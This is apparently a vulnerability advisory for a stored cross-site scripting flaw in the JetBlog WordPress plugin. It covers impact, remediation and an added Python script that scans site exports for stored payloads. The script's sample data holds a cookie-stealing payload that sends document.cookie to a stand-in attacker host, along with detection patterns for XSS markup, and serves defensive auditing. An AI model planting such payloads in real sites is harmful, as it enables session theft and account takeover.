CVE-2025-49932

MEDIUM 6.5 (CVSS 3.1)
Published 2025-10-22

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

Lifecycle Timeline

Analysis Generated: Apr 01, 2026 - 15:22 (vuln.today)
CVE Published: Oct 22, 2025 - 15:15 (nvd), scored MEDIUM 6.5

Description (NVD)

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetBlog jet-blog allows Stored XSS. This issue affects JetBlog: from n/a through <= 2.4.4.1.

Analysis (AI)

Stored cross-site scripting (XSS) in the Crocoblock JetBlog WordPress plugin, versions through 2.4.4.1, lets an authenticated user with low privileges (CVSS PR:L; in WordPress terms, any role that can submit content the plugin renders, such as a contributor) persist a script payload that is later served to other visitors. The script runs in the victim's browser in the site's origin (S:C) as soon as they load the affected page (UI:R), where it can read session cookies or nonces, exfiltrate data, or perform actions with the victim's privileges, including an administrator's. The EPSS score of 0.07% and the absence of public exploit code point to a low real-world exploitation probability despite the medium CVSS 6.5.

Technical Context (AI)

The vulnerability is improper neutralization of user input during HTML page generation (CWE-79). JetBlog (plugin slug jet-blog) handles blog content creation and display in WordPress. The plugin writes user-supplied input into its HTML output without the escaping appropriate to the context (text node, attribute value or URL), so an authenticated user can store JavaScript that executes in the context of the vulnerable site. Because the XSS is stored, the payload lives in the WordPress database and is rendered to every subsequent visitor of the affected page, front end or dashboard, without any need to lure a victim to a crafted link; this makes it more dangerous than a reflected variant with otherwise identical impact.

Affected Products (AI)

All releases of the Crocoblock JetBlog WordPress plugin (jet-blog) up to and including 2.4.4.1 are affected; the advisory gives no lower bound. Administrators can check the installed version under Plugins in the WordPress dashboard or with `wp plugin list` and should compare it against the fixed release named on Patchstack.

Remediation (AI)

Update Crocoblock JetBlog to a release later than 2.4.4.1; this page does not name the fixed version, so confirm it in the Patchstack entry at https://patchstack.com/database/Wordpress/Plugin/jet-blog/vulnerability/wordpress-jetblog-plugin-2-4-4-1-cross-site-scripting-xss-vulnerability, which also carries any vendor guidance. If a patched release cannot be applied immediately, limit content authoring rights to trusted users, since the attacker must be authenticated, and audit existing posts and plugin-managed fields for injected markup such as script tags, inline event handlers and javascript: URLs. Disabling the plugin on production sites until the fix is installed stops it rendering the affected fields, but does not remove payloads already stored, so audit before re-enabling it.
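The audit step above, and the Technical Context's point that a stored payload persists in the database, can be put into practice with a scan of a WordPress export. The script below is an added example, not code from vuln.today, NVD, Patchstack or Crocoblock: it parses a WXR export (the XML produced by Tools > Export or `wp export`), flags post content and custom fields that contain script tags, inline event handlers, javascript: URLs or embedding elements, and shows what output escaping would have turned a flagged value into. The sample export is constructed for the example, and the meta key `_jet_blog_subtitle` is an assumption, not one of the plugin's real keys.

```python
"""Scan a WordPress WXR export for stored XSS payloads (added example)."""
import html
import re
import xml.etree.ElementTree as ET

# Namespaces used by the WXR export format.
NS = {
    "content": "http://purl.org/rss/1.0/modules/content/",
    "wp": "http://wordpress.org/export/1.2/",
}

# Markup that should never appear in content the plugin renders unescaped.
# Each pattern is named so a finding says what kind of payload matched.
SUSPICIOUS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    # attribute names starting with "on" preceded by whitespace or "/" (e.g. <img/onerror=)
    ("event-handler", re.compile(r"[\s/]on[a-z]+\s*=", re.I)),
    ("javascript-url", re.compile(r"(?:href|src|action)\s*=\s*['\"]?\s*javascript:", re.I)),
    ("embedding-element", re.compile(r"<\s*(?:svg|iframe|object|embed)\b", re.I)),
]

# Constructed sample export: one clean post and one carrying two injected payloads.
# The meta key _jet_blog_subtitle is hypothetical.
SAMPLE_WXR = """<rss version="2.0"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:wp="http://wordpress.org/export/1.2/">
<channel>
  <item>
    <title>Benign post</title>
    <wp:post_id>10</wp:post_id>
    <wp:post_author>editor</wp:post_author>
    <content:encoded><![CDATA[<p>Hello <strong>world</strong></p>]]></content:encoded>
  </item>
  <item>
    <title>Injected post</title>
    <wp:post_id>11</wp:post_id>
    <wp:post_author>contributor</wp:post_author>
    <content:encoded><![CDATA[<p>Read more</p><img src=x onerror="fetch('https://attacker.invalid/?c='+document.cookie)">]]></content:encoded>
    <wp:postmeta>
      <wp:meta_key>_jet_blog_subtitle</wp:meta_key>
      <wp:meta_value><![CDATA[<script>alert(document.domain)</script>]]></wp:meta_value>
    </wp:postmeta>
  </item>
</channel>
</rss>
"""


def find_payloads(text):
    """Return the names of the SUSPICIOUS patterns that match text (empty if clean)."""
    return [name for name, rx in SUSPICIOUS if rx.search(text or "")]


def audit_export(wxr_xml):
    """Walk every <item> in a WXR export and return one finding per flagged field.

    A finding records the post id, the author who last saved it, the field that
    held the payload (post_content or a postmeta key) and the matched patterns.
    """
    root = ET.fromstring(wxr_xml)
    findings = []
    for item in root.iter("item"):
        post_id = item.findtext("wp:post_id", default="?", namespaces=NS)
        author = item.findtext("wp:post_author", default="?", namespaces=NS)
        fields = {"post_content": item.findtext("content:encoded", default="", namespaces=NS)}
        for meta in item.findall("wp:postmeta", NS):
            key = meta.findtext("wp:meta_key", default="", namespaces=NS)
            fields[key] = meta.findtext("wp:meta_value", default="", namespaces=NS)
        for field, value in fields.items():
            hits = find_payloads(value)
            if hits:
                findings.append(
                    {"post_id": post_id, "author": author, "field": field, "patterns": hits}
                )
    return findings


def escaped_for_html(value):
    """Show what context-appropriate output escaping does to a stored payload.

    html.escape stands in for WordPress's esc_html()/esc_attr(): <, >, &, " and '
    become entities, so the browser shows the payload as text instead of running it.
    """
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for f in audit_export(SAMPLE_WXR):
        print(f"post {f['post_id']} by {f['author']}: {f['field']} matched {', '.join(f['patterns'])}")
```

Run it against a real export by replacing SAMPLE_WXR with the file contents. The patterns are deliberately broad and will flag legitimate embeds, so treat a hit as something to review by author and date rather than delete automatically; a match saved by a low-privileged account is the case this CVE describes.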
